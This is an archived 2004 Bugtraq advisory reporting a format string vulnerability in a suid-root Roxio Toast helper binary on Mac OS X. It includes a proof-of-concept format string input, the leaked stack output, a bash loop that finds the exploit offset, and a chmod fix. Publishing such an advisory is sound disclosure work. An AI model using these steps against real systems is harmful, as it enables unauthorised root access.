lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4cb4bda104121322404e31f819@mail.gmail.com>
Date: Tue, 14 Dec 2004 01:40:17 -0500
From: fintler <fintler@...il.com>
To: bugtraq@...urityfocus.com
Subject: Possible local root vulnerability in Roxio Toast on Mac OS X


Possible local root vulnerability in Roxio Toast on Mac OS X
By fintler <fintler@...il.com>

Summary:

There is a format string bug in the binary (/Library/Application
Support/Roxio/TDIXSupport). It is installed suid root by default and
may be exploited by finding the offset and overwriting the stack with
malicious instructions.

Example:
fintler@...en:/Library/Application Support/Roxio$ ls -l TDIXSupport 
-rwsr-sr-x  1 root  wheel  14260  5 Nov  2003 TDIXSupport
fintler@...en:/Library/Application Support/Roxio$ ./TDIXSupport
"AAAAAAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x"
kextload: /Library/Application
Support/Roxio/AAAAAAAAAAAAAAA905d2ce23a206e6f20737563682062756e646c652066696c652065789058a58c61e0403b4300090000ef0bfffee90bffff44064b26064b26064b2d061e2503032b09058a52cbfffef10440222229058a5f01100061e250fefefeff1173004a0ffffffff61e0409058e868bfffef10440282449058ea9c90197d3801696246a064b2d02314664b06061e040a00011ac3a000003032b09057df58bfffef303007a0103009f0bffff44064b2603032b03009f0030118090597b38bfffef802402824290597bc09058f61cbfffef80304b903032b09058f61cbfffef80090580a2416904017a01900e064b2d040300e60300e60016964b26000304b903032b09058f61cbffff000240222249058f74c0030083000bffff00048022422901b7ab4304b908ffffffff300e60624270a0193140a01900e062427090197d38bffff0502802244803009f003008003008101013008303032b0bffff48024022224474c00301520bffff2e00300d903817a01900e011805300a0192e946242702f4c6962726172792f4170706c69636174696f6e20537570706f72742f526f78696f2f4141414141:
no such bundle file exists
can't add kernel extension /Library/Application
Support/Roxio/AAAAAAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
(file access/permissions) (run kextload on this kext with -t for
diagnostic output)
fintler@...en:/Library/Application Support/Roxio$
for((i=1;i<1000;i++));do echo -n "$i "&&./TDIXSupport
"AAAAAAAAAAAAAAAAAAAAAAA%$i\$x";done|grep 4141 2>/dev/null
etc...

Solution:
A possible way of fixing this issue is to change the permissions of
the binary to non-suid root by issuing the following command:
'sudo chmod 0755 /Library/Application Support/Roxio/TDIXSupport'
This will most likely disable some functionality of Toast.

EOF


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ